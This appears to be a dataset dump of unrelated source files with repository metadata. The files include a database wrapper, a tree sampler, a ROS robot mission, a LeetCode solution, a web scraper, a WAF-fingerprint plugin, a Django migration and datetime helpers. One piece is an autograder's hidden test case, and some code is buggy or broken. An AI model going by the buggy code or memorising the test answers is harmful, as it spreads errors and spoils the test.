                      WHERE ID=%s;""" % (q_fields, table_name, self.coll_id)

        rows = self.db.doSelect (queryStr)
        if len(rows) > 0:
            return TableRow (rows[0], schema)

    def getContentItems (self, schema=None):
        """
        gets all content items for this collection as a list
        of TableRow instances
        """
        table_name = 'tblCollections_Content'
        if schema is None:
            schema = self.db.getSchema(table_name)
            q_fields = '*'
        else:
            q_fields = ','.join(schema)
        queryStr = """SELECT %s FROM %s
                      where CollectionId=%s;""" % (q_fields, table_name, self.coll_id)
        rows = self.db.doSelect (queryStr)
        results = []
        for row in rows:
            results.append (TableRow (row, schema))
        return results

    def getContentChildren (self, parent_id, schema=None):
        """
        gets children items for given parent_id as a list
        of TableRow instances
        """
        table_name = 'tblCollections_Content'
        if schema is None:
            schema = self.db.getSchema(table_name)
            q_fields = '*'
        else:
            q_fields = ','.join(schema)
        queryStr = """SELECT %s FROM %s
                      WHERE CollectionId=%s AND ParentID=%s;""" % (q_fields, table_name, self.coll_id, parent_id)
        rows = self.db.doSelect (queryStr)
        results = []
        for row in rows:
            results.append (TableRow (row, schema))
        return results
def getCollection (coll_id):
    """Open a fresh ArchonDB connection and wrap *coll_id* in an
    ArchonDBCollection."""
    return ArchonDBCollection(ArchonDB(), coll_id)
def contentChildrenTester():
    # Manual smoke test (Python 2): print the top-level children
    # (ParentID='0') of collection 3.
    coll_id = 3
    collection = getCollection (coll_id)
    schema = ['ID','Title','ParentID']
    parent_id = '0'
    recs = collection.getContentChildren(parent_id, schema)
    print '%d recs returned' % len(recs)
    print recs[0]
def collectionContentTester():
    # Manual smoke test (Python 2): print all content items of collection 3.
    coll_id = 3
    collection = getCollection (coll_id)
    schema = ['ID','Title','ParentID']
    recs = collection.getContentItems(schema)
    print '%d recs returned' % len(recs)
    print recs[0]
def contentRecsTester():
coll_id = 3
collection = getCollection (coll_id)
schema = ['ID','Title','ParentID']
recs = db.getCollectionContent(coll_id, schema)
print '%d recs returned' % len(recs)
print recs[0]
def getCollectionRecTester():
    # Manual smoke test (Python 2): print collection 3's own record.
    coll_id = 3
    collection = getCollection (coll_id)
    schema = ['ID','CollectionIdentifier', 'Title']
    rec = collection.getCollectionRec(schema)
    print rec
if __name__ == "__main__":
# contentChildrenTester()
# collectionContentTester()
# getCollectionRecTester()
collection = getCollection(3)
print 'collection: ', collection.title
| [
"ostwald@ucar.edu"
] | ostwald@ucar.edu |
017aaf3026c55564f3912bd767f8a1a6adeef5a2 | 9322c270beaf1019328bf14c836d167145d45946 | /raoteh/sampler/_sample_mc0.py | b20d507908331f99b40855d708bc90835d53697a | [] | no_license | argriffing/raoteh | 13d198665a7a3968aad8d41ddad12c08d36d57b4 | cdc9cce8fdad0a79dbd90dfcdec6feece8fc931f | refs/heads/master | 2021-01-22T19:41:25.828133 | 2014-03-10T22:25:48 | 2014-03-10T22:25:48 | 10,087,018 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,229 | py | """
Sample Markov chain trajectories on trees.
Sample states using the observation data and constraints
only through a pre-computed sparse map, for each node, from a feasible state
to a subtree likelihood.
"""
from __future__ import division, print_function, absolute_import
import numpy as np
import networkx as nx
from raoteh.sampler import _util, _mc0
__all__ = []
def resample_states(T, root, node_to_pmap, root_distn=None, P_default=None):
    """
    This function applies to a tree for which nodes will be assigned states.

    Parameters
    ----------
    T : undirected acyclic networkx graph
        A tree whose edges are annotated with transition matrices P.
    root : integer
        The root node.
    node_to_pmap : dict
        A map from a node to a sparse map from a feasible state
        to a subtree likelihood.
    root_distn : dict, optional
        A sparse finite distribution or weights over root states.
        Values should be positive but are not required to sum to 1.
        If the distribution is not provided,
        then it will be assumed to have values of 1 for each possible state.
    P_default : directed weighted networkx graph, optional
        If an edge is not annotated with a transition matrix P,
        then this default transition matrix will be used.

    Returns
    -------
    node_to_sampled_state : dict
        A map from each node of T to its state.
        If the state was not defined by the node_to_state argument,
        then the state will have been sampled.

    """
    # Get the root pmap.
    root_pmap = node_to_pmap[root]

    # Try to compute the likelihood.
    # This will raise an informative exception if no path is possible.
    # If the likelihood is numerically zero then raise a different exception.
    likelihood = _mc0.get_likelihood(root_pmap, root_distn=root_distn)
    if likelihood <= 0:
        raise _util.NumericalZeroProb(
                'numerically intractably small likelihood: %s' % likelihood)

    # Bookkeeping structure related to tree traversal.
    # predecessors maps each non-root node to its parent in the DFS tree.
    predecessors = nx.dfs_predecessors(T, root)

    # Sample the node states, beginning at the root, so each node's parent
    # has already been assigned a state when the node is visited.
    node_to_sampled_state = {}
    for node in nx.dfs_preorder_nodes(T, root):

        # Get the precomputed pmap associated with the node.
        # This is a sparse map from state to subtree likelihood.
        pmap = node_to_pmap[node]

        # Define a prior distribution.
        if node == root:
            # May be None; the _util helper below presumably treats a
            # missing prior as uniform (matching root_distn's docstring).
            prior = root_distn
        else:

            # Get the parent node and its state.
            parent_node = predecessors[node]
            parent_state = node_to_sampled_state[parent_node]

            # Get the transition probability matrix.
            P = T[parent_node][node].get('P', P_default)

            # Get the distribution of a non-root node: transition weights
            # restricted to states that are feasible for the subtree.
            sinks = set(P[parent_state]) & set(pmap)
            prior = dict((s, P[parent_state][s]['weight']) for s in sinks)

        # Sample the state from the posterior distribution.
        dpost = _util.get_unnormalized_dict_distn(pmap, prior)
        node_to_sampled_state[node] = _util.dict_random_choice(dpost)

    # Return the map of sampled states.
    return node_to_sampled_state
| [
"argriffi@ncsu.edu"
] | argriffi@ncsu.edu |
35eddafba63d712b81976f456f86c8c65fe3bc42 | 547db7801930874bf8298304b7ae453695ab3751 | /zeabus_command/src/roulette.py | 156d25ede5bdc7f7e7b65b65f3a6b8b19e13ab04 | [] | no_license | skconan/zeabus2018 | 5fc764b5039799fa7d80f7e86345822b50282d2e | 16e2fc1a21daea813833f9afb89f64142b5b8682 | refs/heads/master | 2020-03-25T12:39:38.759263 | 2018-07-27T23:53:50 | 2018-07-27T23:53:50 | 143,786,404 | 0 | 1 | null | 2018-08-06T21:41:52 | 2018-08-06T21:41:52 | null | UTF-8 | Python | false | false | 4,412 | py | #!/usr/bin/python2.7
import rospy
import math as m
import constants as cons
from aicontrol import AIControl
from zeabus_vision.msg import vision_roulette
from zeabus_vision.srv import vision_srv_roulette
from std_msgs.msg import String
class roulette(object) :
def __init__(self) :
print '<===INIT BIN===>'
self.aicontrol = AIControl()
self.data = vision_roulette
rospy.wait_for_service('vision_roulette')
self.detect_roulette = rospy.ServiceProxy('vision_roulette',vision_srv_roulette)
self.center = 0
self.reset = 0
def detectBin(self, req) :
self.data = self.detect_roulette(String('roulette'), String('green'))
self.data = self.data.data
def pinger(self) :
self.data = self.pinger(String('roulette'))
self.data = self.data.data
def checkCenter(self) :
print 'checking'
auv = self.aicontrol
cx = self.data.cx
cy = self.data.cy
appear = self.data.appear
self.detectBin('green')
#check bin center
if appear :
if -cons.VISION_ROULETTE_ERROR <= cx <= cons.VISION_ROULETTE_ERROR and -cons.VISION_ROULETTE_ERROR <= cy <= cons.VISION_ROULETTE_ERROR :
self.center += 1
print 'center:%d'%center
else :
self.reset +=1
auv.multiMove([cx, cy, 0, 0, 0, 0])
#check center counter
if center >= 1:
print '<<<CHECK CENTER>>>'
return True
elif resetx >= 5:
centerx = 0
resetx = 0
def run(self) :
auv = self.aicontrol
print '<===DOING BIN===>'
mode = 1
count = 0
reset = 0
while not rospy.is_shutdown() and not mode == -1:
'''
if mode == 0 : #find pinger
print '<---mode 0--->'
self.pinger()
anglex = self.data.anglex
angley = self.data.angley
I = self.data.intensity
auv.ternRelative(anglex)
if not angley == m.pi/2 :
auv.move('forward', cons.AUV_H_SPEED)
auv.stop()
mode = 1
'''
if mode == 1 : #find green bin
print '<---mode 1--->'
auv.depthAbs(-2.5, 0.5)
self.detectBin('green')
appear = self.data.appear
if appear :
count += 1
reset = 0
print 'FOUND BIN: %d'%(count)
elif not appear:
reset += 1
print 'NOT FOUND BIN: %d'%(reset)
# check counter
if count >= 5:
count = 0
reset = 0
print 'let\'s to adjust->>>'
auv.stop()
mode = 2
elif reset >= 5:
reset = 0
count = 0
auv.move('forward', cons.AUV_M_SPEED)
if mode == 2 : #check bin
print '<---mode 2--->'
#############################
self.detectBin('green')
appear = self.data.appear
cx = self.data.cx
cy = self.data.cy
area = self.data.area
print '--------------------'
print 'cx:%f'%(cx)
print 'cy:%f'%(cy)
print 'appear: %s'%(appear)
print
#############################
if appear :
if self.checkCenter() :
if area >= 0.03 :
print 'let\'s it go!!!'
auv.stop()
mode = -1
elif area < 0.03 :
#auv.move('down', cons.AUV_M_SPEED)
auv.depthRelative(-0.5, 0.2)
auv.stop()
elif not appear :
#auv.move('down', cons.AUV_M_SPEED)
auv.depthRelative(0.1, 0.1)
auv.stop()
print 'Roulette completed'
if __name__=='__main__' :
    # Start the ROS node and run the mission.  NOTE(review): the local
    # `roulette` shadows the class name after instantiation.
    rospy.init_node('roulette_node')
    roulette = roulette()
    roulette.run()
| [
"supakit.kr@gmail.com"
] | supakit.kr@gmail.com |
b1ad9418990788e4ac1dbab024f74de584c180ae | ccd30f827fb3bd4231c59d05e6d61c5963019291 | /practice/LeetCode/EverydayPrac/150.py | 9fc08e4de74ee5b184260c5912aad7db0eb8dada | [] | no_license | anthony20102101/Python_practice | d6709e7768baebaa248612e0795dd3e3fa0ae6ba | 56bb1335c86feafe2d3d82efe68b207c6aa32129 | refs/heads/master | 2023-06-10T18:49:11.619624 | 2021-06-27T15:36:10 | 2021-06-27T15:36:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,380 | py | # 523. Continuous Subarray Sum
# Given an integer array nums and an integer k, return true if nums has a continuous subarray of size at least two whose elements sum up to a multiple of k, or false otherwise.
#
# An integer x is a multiple of k if there exists an integer n such that x = n * k. 0 is always a multiple of k.
#
# Example 1:
#
# Input: nums = [23,2,4,6,7], k = 6
# Output: true
# Explanation: [2, 4] is a continuous subarray of size 2 whose elements sum up to 6.
#
# Example 2:
#
# Input: nums = [23,2,6,4,7], k = 6
# Output: true
# Explanation: [23, 2, 6, 4, 7] is an continuous subarray of size 5 whose elements sum up to 42.
# 42 is a multiple of 6 because 42 = 7 * 6 and 7 is an integer.
#
# Example 3:
#
# Input: nums = [23,2,6,4,7], k = 13
# Output: false
# 前缀和 + 哈希表
from typing import List
class Solution:
    """LeetCode 523: does nums contain a subarray of length >= 2 whose sum
    is a multiple of k?"""

    def checkSubarraySum(self, nums: List[int], k: int) -> bool:
        # Two prefix sums with the same residue mod k bracket a subarray
        # whose sum is a multiple of k.  Remember the *earliest* index of
        # each residue; a repeat at distance >= 2 means a qualifying
        # subarray exists (the earliest occurrence maximises the gap).
        first_seen = {0: -1}  # residue -> earliest prefix index
        running = 0
        for idx, value in enumerate(nums):
            running = (running + value) % k
            if running in first_seen:
                if idx - first_seen[running] >= 2:
                    return True
            else:
                first_seen[running] = idx
        return False
# In Python, use a dict or a set to store the previously seen prefix sums.
# Leftover manual fixtures (never passed to Solution in this file).
nums = [23,2,6,4,7]
k = 6
| [
"492193947@qq.com"
] | 492193947@qq.com |
f0df2cc5b671215861961d2add55877278d159de | 42064191a5ac586ed088b293165b51abf16b1ee4 | /Data Wrangling with MongoDB/Lesson3/PS3.py | 91a40fe4cd4f84a34b1bf8e34b7f815fcc1f1823 | [] | no_license | ObinnaObeleagu/Udacity | 637cd458824a835febacebd72ebef77b30ca7f94 | 761ba413934f66cbd9429fd9882f59f047eb065b | refs/heads/master | 2023-03-15T23:27:23.022463 | 2019-01-03T04:05:03 | 2019-01-03T04:05:03 | 497,375,575 | 1 | 0 | null | 2022-05-28T16:46:12 | 2022-05-28T16:46:12 | null | UTF-8 | Python | false | false | 2,140 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
In this problem set you work with cities infobox data, audit it, come up with a cleaning idea and then clean it up.
Since in the previous quiz you made a decision on which value to keep for the "areaLand" field,
you now know what has to be done.
Finish the function fix_area(). It will receive a string as an input, and it has to return a float
representing the value of the area or None.
You have to change the function fix_area. You can use extra functions if you like, but changes to process_file
will not be taken into account.
The rest of the code is just an example on how this function can be used.
"""
import codecs
import csv
import json
import pprint
CITIES = 'cities.csv'
def fix_area(area):
    """Normalise one cities-infobox areaLand value.

    Returns None for "NULL", a float for a plain numeric string, and for a
    "{a|b}" pair the number with more decimal digits (ties -> the second).
    """
    if area == "NULL":
        return None
    if is_float(area):
        return float(area)
    # "{a|b}": strip the braces off each half of the pair.
    pieces = area.split("|")
    left = pieces[0][1:]     # drop leading "{"
    right = pieces[1][:-1]   # drop trailing "}"
    if len(left.split(".")[1]) > len(right.split(".")[1]):
        return float(left)
    return float(right)


def is_float(s):
    """Return True if *s* parses as a float, False otherwise."""
    try:
        float(s)
    except ValueError:
        return False
    return True
def process_file(filename):
    # CHANGES TO THIS FUNCTION WILL BE IGNORED WHEN YOU SUBMIT THE EXERCISE
    # Reads the cities CSV as dicts, skips the 3 metadata rows that follow
    # the header, and cleans each row's "areaLand" via fix_area().
    # (Python 2: uses reader.next().)
    data = []
    with open(filename, "r") as f:
        reader = csv.DictReader(f)
        #skipping the extra matadata
        for i in range(3):
            l = reader.next()
        # processing file
        for line in reader:
            # calling your function to fix the area value
            if "areaLand" in line:
                line["areaLand"] = fix_area(line["areaLand"])
            data.append(line)
    return data
def test():
    # Print a few cleaned areaLand values for eyeballing (Python 2 prints).
    data = process_file(CITIES)
    print "Printing three example results:"
    for n in range(5,8):
        pprint.pprint(data[n]["areaLand"])
    #assert data[8]["areaLand"] == 55166700.0
    #assert data[3]["areaLand"] == None

if __name__ == "__main__":
    test()
| [
"ryanzjlib@gmail.com"
] | ryanzjlib@gmail.com |
85e7ff6d8a4a5d8700d898024ad21483459573bc | 7f54637e347e5773dfbfded7b46b58b50544cfe5 | /7-3/chainxy/spiders/snipits.py | d97156f5c9e1759c9c1c3827989bfd035823b300 | [] | no_license | simba999/all-scrapy | 5cc26fd92b1d03366b74d4fff58c4a0641c85609 | d48aeb3c00fa2474153fbc8d131cf58402976e1d | refs/heads/master | 2021-01-25T14:24:04.715550 | 2018-03-03T13:43:13 | 2018-03-03T13:43:13 | 123,695,640 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,985 | py | import scrapy
import json
import os
from scrapy.spiders import Spider
from scrapy.http import FormRequest
from scrapy.http import Request
from chainxy.items import ChainItem
from lxml import etree
from selenium import webdriver
from lxml import html
import usaddress
class snipits(scrapy.Spider):
    # Scrapy spider (Python 2) that crawls the snipits.com store locator and
    # yields one ChainItem per store.
    name = 'snipits'
    domain = ''
    history = []

    def start_requests(self):
        # Entry point: fetch the store-locations index page.
        init_url = 'http://www.snipits.com/locations'
        yield scrapy.Request(url=init_url, callback=self.body)

    def body(self, response):
        # Follow every per-store link found on the index page.
        print("========= Checking.......")
        store_list = response.xpath('//div[@class="loc-result"]//a/@href').extract()
        for store in store_list:
            yield scrapy.Request(url=store, callback=self.parse_page)

    def parse_page(self, response):
        # Scrape one store page.  NOTE(review): the bare except silently
        # drops any store whose page doesn't match the expected layout.
        try:
            item = ChainItem()
            detail = self.eliminate_space(response.xpath('//section[@id="hero"]//div[@class="one-third"]//p[1]//text()').extract())
            item['address'] = detail[0]
            # detail has 3 or 4 lines; the last is the phone number and the
            # one before it is "City, ST zip" -- assumed from the two
            # branches below, verify against live pages.
            if len(detail) == 4:
                addr = detail[2].split(',')
                item['phone_number'] = detail[3]
            else :
                addr = detail[1].split(',')
                item['phone_number'] = detail[2]
            item['city'] = self.validate(addr[0].strip())
            item['state'] = self.validate(addr[1].strip().split(' ')[0].strip())
            item['zip_code'] = self.validate(addr[1].strip().split(' ')[1].strip())
            item['country'] = 'United States'
            h_temp = ''
            hour_list = self.eliminate_space(response.xpath('//section[@id="hero"]//div[@class="one-third"]//table//text()').extract())
            cnt = 1
            # Table cells come in (day, hours) pairs: join as
            # "day hours, day hours, ..." then trim the trailing ", ".
            for hour in hour_list:
                h_temp += hour
                if cnt % 2 == 0:
                    h_temp += ', '
                else:
                    h_temp += ' '
                cnt += 1
            item['store_hours'] = h_temp[:-2]
            yield item
        except:
            pass

    def validate(self, item):
        # Normalise a scraped string: strip non-breaking spaces and
        # en-dash escapes; returns '' if encoding fails (Python 2 str path).
        try:
            return item.encode('raw-unicode-escape').replace('\xa0', '').replace('\u2013', '').strip()
        except:
            return ''

    def eliminate_space(self, items):
        # Keep only entries that are non-empty after validate().
        tmp = []
        for item in items:
            if self.validate(item) != '':
                tmp.append(self.validate(item))
        return tmp
return tmp | [
"oliverking8985@yahoo.com"
] | oliverking8985@yahoo.com |
482e4bd3661237b354f821f1c4da2255cf34b7db | d01f71eadb5039f8cba9550cf12832add292cc50 | /labs/lab03/student/tests/q4a.py | 4fbb938c9f943c38af8d25a437262426ac831c36 | [] | no_license | essentialols/Spring2020 | 929208b08d5ff2e62347420cc02489f2857690cd | 2369fe6939e7bf2c30cccbeb6cdd040806e998ff | refs/heads/master | 2022-09-07T09:19:51.262662 | 2020-05-29T09:45:15 | 2020-05-29T09:45:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,734 | py | test = { 'hidden': False,
'name': 'q4a',
'points': 1,
'suites': [ { 'cases': [ { 'code': '>>> import matplotlib ;\n'
'>>> '
'np.alltrue(np.array([l.get_text() '
'for l in '
'ax_4a.xaxis.get_ticklabels()]) '
'== days)\n'
'True',
'hidden': False,
'locked': False},
{ 'code': '>>> bars = [rect.get_height() '
'for rect in '
'ax_4a.get_children() \n'
'... if '
'isinstance(rect, '
'matplotlib.patches.Rectangle) '
'and rect.get_x() != 0.0\n'
'... ];\n'
'>>> '
'np.allclose(np.array(bars)[-3:], '
'[1, 1, 2])\n'
'True',
'hidden': False,
'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
| [
"syoh@ucsb.edu"
] | syoh@ucsb.edu |
8aa9cf895f0bca3ee0e03003a7685af44fc89f17 | 263d6606dd72044b406b97e1a2e8cb16c4354c85 | /matrix.py | ebb111cc57474279d0ef225c7736d088813710e4 | [] | no_license | THABUULAGANATHAN/playerlevel | 6912ba792b128e36ff9ea4f15e508d3d442932ad | fe1813b25c94eb907df3fda63215b1755a8826fa | refs/heads/master | 2022-01-21T05:07:40.245217 | 2019-07-19T08:56:44 | 2019-07-19T08:56:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | ro1=int(input())
ro2=[]
for v in range(0,ro1):
ro2.append(list(map(int,input().split())))
z=0
k=0
for v in range(0,ro1):
for j in range(0,ro1):
if ro2[v][j]==1:
if v!=ro1-1 and ro2[v+1][j]==0:
z=z+1
if j!=ro1-1 and ro2[v][j+1]==0:
z=z+1
if v!=0 and ro2[v-1][j]==0:
z=z+1
if j!=0 and ro2[v][j-1]==0:
z=z+1
if v==0 and j==0 or v==ro1-1 and j==ro1-1 or v==0 and j==ro1-1 or v==ro1-1 and j==0 and z==2:
k=k+1
elif v==1 and j>0 and j<d-1 and z==3:
k=k+1
elif z==4:
k=k+1
z=0
print(k)
| [
"noreply@github.com"
] | THABUULAGANATHAN.noreply@github.com |
421011b0b2e0093abd8faf8e9f72af3f667b5198 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2007.2/applications/games/Ri-li/actions.py | 44afdafc2bd786859cbf9f6858265c1469318ad0 | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2006 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure()
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("AUTHORS", "ChangeLog", "NEWS", "README", "COPYING")
| [
"yusuf.aydemir@istanbul.com"
] | yusuf.aydemir@istanbul.com |
dc57bbab4ee8d0fcac00864f4c34d13d0c8f4260 | a0afcdcfcd0c139be8a975e8bd31692b43806922 | /__Concluir__/lendo_json/json_.py | 96385d65e11d16b897ddb19ffd0110868bc2468b | [] | no_license | luiz158/Dica_Python_Linkedin | f3b9b95e2929edbd1d49c51ad54e6f3ba2721913 | d92130ab70742bad983989ad0d7fbb542a854f1d | refs/heads/master | 2023-08-17T10:12:31.094026 | 2021-09-19T11:16:29 | 2021-09-19T11:16:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | import json
# Demo: parse a JSON document into a dict and print two of its fields.
# (Variable names are Portuguese: dados = data, carregar = load.)
dados_json = '{"name": "Erickson", "age": 19, "city": "São Paulo"}'
carregar_dados = json.loads(dados_json)
print(carregar_dados['name'])
# Erickson
print(carregar_dados['age'])
# 19
| [
"ofc.erickson@gmail.com"
] | ofc.erickson@gmail.com |
6cda669b6a6658e279c87446ed23b98a68170333 | f47863b3a595cbe7ec1c02040e7214481e4f078a | /plugins/waf/blockdos.py | e6bb4d7aa13dc59305b9f57a9c5e9557c6578ebe | [] | no_license | gobiggo/0bscan | fe020b8f6f325292bda2b1fec25e3c49a431f373 | 281cf7c5c2181907e6863adde27bd3977b4a3474 | refs/heads/master | 2020-04-10T20:33:55.008835 | 2018-11-17T10:05:41 | 2018-11-17T10:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | import re
from config import HTTP_HEADER
__product__ = "BlockDos DDoS protection (BlockDos)"
def detect(content, **kwargs):
    """Return True when the response identifies BlockDos DDoS protection.

    Matches "blockdos.net" (case-insensitive) in the Server header;
    implicitly returns None (falsy) otherwise.  `content` is unused here.
    """
    headers = kwargs.get("headers", None)
    server_value = headers.get(HTTP_HEADER.SERVER, "")
    patterns = (
        re.compile(r"blockdos\.net", re.I),
    )
    for pattern in patterns:
        if pattern.search(server_value) is not None:
            return True
| [
"zer0i3@aliyun.com"
] | zer0i3@aliyun.com |
75200e6184bed8483c342fedcef21aba6ab696c7 | 92957173706467d31f9ad3cb4343f384312b7248 | /arkestra_image_plugin/testrunner.py | d63e009477a28766ba13a77be0df4f87609a1870 | [
"BSD-2-Clause"
] | permissive | evildmp/Arkestra | edc010f8726efe928ac453edf252705845ca98d6 | 3e7f7d8e109221180866fe482c70a94e635fd594 | refs/heads/develop | 2020-04-06T04:22:15.003712 | 2016-02-11T15:20:02 | 2016-02-11T15:20:02 | 1,449,804 | 57 | 12 | null | 2016-02-12T23:05:26 | 2011-03-07T11:49:47 | Python | UTF-8 | Python | false | false | 153 | py | from django.conf import settings
# Minimal standalone Django settings so tests can run outside a project.
settings.configure(DEBUG=True, TEMPLATE_DEBUG=True,
    TEMPLATE_DIRS=('/home/web-apps/myapp', '/home/web-apps/base'))
| [
"daniele@vurt.org"
] | daniele@vurt.org |
b9b6d67a147122f5ac8f755cafbe94b22c1e4345 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/2D_20200722172559.py | 5059d62102aea6cdd5f5ee56dd0183f19e3c1566 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | def array(n,m):
# where n is row size and m is column size
array = [[0 for x in range(n)] for x in range(m)]
print(array)
a = [[2, 4, 6, 8, 10], [3, 6, 9, 12, 15], [4, 8, 12, 16, 20]]
# a[row][column]: the first index selects the row, the second the column.
print(a[0][3])  # -> 8
def hourGlass(arr):
    """Return the maximum "hourglass" sum in the 2-D list *arr*.

    An hourglass is the 7-cell pattern anchored at (i, j):

        a b c
          d
        e f g

    Returns 0 when the array is empty or too small to hold an hourglass.
    Assumes a rectangular matrix (rows of equal length).

    Bug fix: the original body referenced an undefined name `count` and
    raised NameError on the first positive cell; this implements the
    intent stated in its comments ("get max hour glass").
    """
    if not arr:
        return 0
    best = None
    for i in range(len(arr) - 2):
        for j in range(len(arr[i]) - 2):
            total = (sum(arr[i][j:j + 3])        # top row
                     + arr[i + 1][j + 1]         # middle cell
                     + sum(arr[i + 2][j:j + 3])) # bottom row
            if best is None or total > best:
                best = total
    return 0 if best is None else best
hourGlass([[1,1,1,0,0,0],[0,1,0,0,0,0],[1,1,1,0,0,0],[0,0,2,4,4],[0,0,0,2,0,0],[0,0,1,2,4,0]]) | [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
96ff4a5ce8802d24066c55849c077829a026bb6e | c831e7f6c434900d817f59a11b25e78a1a5090ad | /Calibration/CalibConfigFiles/Archive/CalibConfig_DetModel72_RecoStage72.py | 568126e57adc41e8c060c5df4ce930df853fb3dc | [] | no_license | StevenGreen1/OptimisationStudies | 8cca03f57d2cbf81e5fb609f13e2fa4b9c9880f6 | c5741e8d2fab4752ceca8b10cc5f2bbc1a7fafa9 | refs/heads/master | 2021-01-18T21:30:51.418785 | 2017-02-21T16:27:50 | 2017-02-21T16:27:50 | 44,306,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | # Calibration config file for testing
# Digitisation Constants - ECal
CalibrECal = 42.4705823941
# Digitisation Constants ILDCaloDigi - HCal
CalibrHCalBarrel = 48.7023928526
CalibrHCalEndcap = 55.5809128718
CalibrHCalOther = 29.7879819428
# Digitisation Constants NewLDCCaloDigi - HCal
CalibrHCal = -1
# Digitisation Constants - Muon Chamber
CalibrMuon = 56.7
# MIP Peak position in directed corrected SimCaloHit energy distributions
# used for realistic ECal and HCal digitisation options
CalibrECalMIP = 0.0001525
CalibrHCalMIP = 0.0004975
# MIP Peak position in directed corrected CaloHit energy distributions
# used for MIP definition in PandoraPFA
ECalToMIPCalibration = 153.846
HCalToMIPCalibration = 38.0228
MuonToMIPCalibration = 10.101
# EM and Had Scale Settings
ECalToEMGeVCalibration = 1.00423799486
HCalToEMGeVCalibration = 1.07513143288
ECalToHadGeVCalibration = 1.16555482522
HCalToHadGeVCalibration = 1.07513143288
# Pandora Threshold Cuts
ECalMIPThresholdPandora = 0.5
HCalMIPThresholdPandora = 0.3
# Hadronic Energy Truncation in HCal PandoraPFA
MaxHCalHitHadronicEnergy = 1.5
# Timing ECal
ECalBarrelTimeWindowMax = 100.0
ECalEndcapTimeWindowMax = 100.0
# Timing HCal
HCalBarrelTimeWindowMax = 100.0
HCalEndcapTimeWindowMax = 100.0
| [
"sg1sg2sg3@hotmail.co.uk"
] | sg1sg2sg3@hotmail.co.uk |
7573037e49e0216374763e873ff5b9b066a40b3f | c2d56799fcd048470769114301f4d834de6eaa5a | /blog/migrations/0002_auto_20170419_1834.py | 661d531ea47ff2f1e2a2749b7be43f82da6b69f0 | [] | no_license | talenhao/django_girls_study | 580d900a596850753dbebcd57b19be473cf05aba | 14c9680aec8619971a6899fd11fa3f6372355809 | refs/heads/master | 2021-01-19T22:24:23.429662 | 2017-04-25T04:25:46 | 2017-04-25T04:25:46 | 88,810,670 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated Django migration: make Post.created_date default to
    # django.utils.timezone.now.

    dependencies = [
        ('blog', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='post',
            name='created_date',
            field=models.DateTimeField(default=django.utils.timezone.now),
        ),
    ]
| [
"talenhao@gmail.com"
] | talenhao@gmail.com |
9c486ba49768093c2ecd81be7540f65170248aa5 | f6189ae8031fcf756cd892ed866cb937bf0e5d56 | /datetime_utils/basic_utils.py | fbfa6703b86fbd2d028bc7ecbe483de0ae1bb85c | [] | no_license | shadhini/python_helpers | f9265ee139a9e32528b257ae1adee731d0d08d3f | d8a74fb22e6da741d9442325661b042c8c26202a | refs/heads/master | 2021-07-05T15:07:02.294986 | 2020-10-28T03:37:01 | 2020-10-28T03:37:01 | 198,464,862 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,257 | py | from datetime import datetime, timedelta
import math
COMMON_DATE_TIME_FORMAT = "%Y-%m-%d %H:%M:%S"


def now_as_string(string_format=None):
    """Return the current local time formatted with *string_format*
    (defaults to COMMON_DATE_TIME_FORMAT)."""
    if string_format is None:
        string_format = COMMON_DATE_TIME_FORMAT
    return datetime.now().strftime(string_format)


def now_as_datetime(format=None):
    """Return now(); when *format* is given, truncate to that format's
    precision by round-tripping through the format string."""
    if format is None:
        return datetime.now()
    return datetime.strptime(datetime.now().strftime(format), format)


def datetime_to_str(datetime_value, string_format=None):
    """Format *datetime_value* as a string (default COMMON_DATE_TIME_FORMAT).

    Bug fix: the original tested ``format is None`` -- ``format`` is the
    builtin, never None -- so the default branch was unreachable and a call
    without *string_format* crashed in strftime(None).
    """
    if string_format is None:
        return datetime_value.strftime(COMMON_DATE_TIME_FORMAT)
    return datetime_value.strftime(string_format)


def str_to_datetime(datetime_string, format=None):
    """Parse *datetime_string* into a datetime (default format:
    COMMON_DATE_TIME_FORMAT).

    Bug fix: the original tested the builtin ``format`` instead of the
    parameter AND was missing both ``return`` statements, so every call
    returned None.
    """
    if format is None:
        format = COMMON_DATE_TIME_FORMAT
    return datetime.strptime(datetime_string, format)
def round_to_nearest_hour(datetime_string, format=None):
    """Round *datetime_string* to the nearest hour (minute > 30 rounds up;
